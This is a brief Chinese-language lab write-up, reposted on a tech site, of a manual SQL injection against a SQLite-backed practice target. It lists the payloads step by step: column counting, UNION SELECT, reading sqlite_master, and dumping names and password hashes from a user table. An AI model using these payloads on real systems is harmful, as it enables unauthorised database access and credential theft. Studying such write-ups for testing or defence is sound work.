SQL手工注入漏洞测试(SQLite数据库)

Yolo山药

2024-05-03 帮助1人

漏洞复现

学新通

判断列

order by 4

学新通

union select 1,2,3,4

学新通

由于根据题意可知是sqlite数据库，许多MySQL数据库的语法不能使用。但是SQLite 存在一个表sqlite_master ，里面的字段：type/name/tbl_name/rootpage/sql记录着用户创建表的信息

爆表的字段

union select 1,name,sql,4 from sqlite_master limit 0,1

学新通

爆字段值

 union select 1,name,password,4 from WSTMart_reg limit 1,1

学新通
有一个是解密不了的，选第二个

学新通

这篇好文章是转载于：学新通技术网

版权申明：本站部分内容来自互联网，仅供学习及演示用，请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系，请提供相关证据及您的身份证明，我们将在收到邮件后48小时内删除。
本站站名：学新通技术网
本文地址： /boutique/detail/tanhgjaakh

系列文章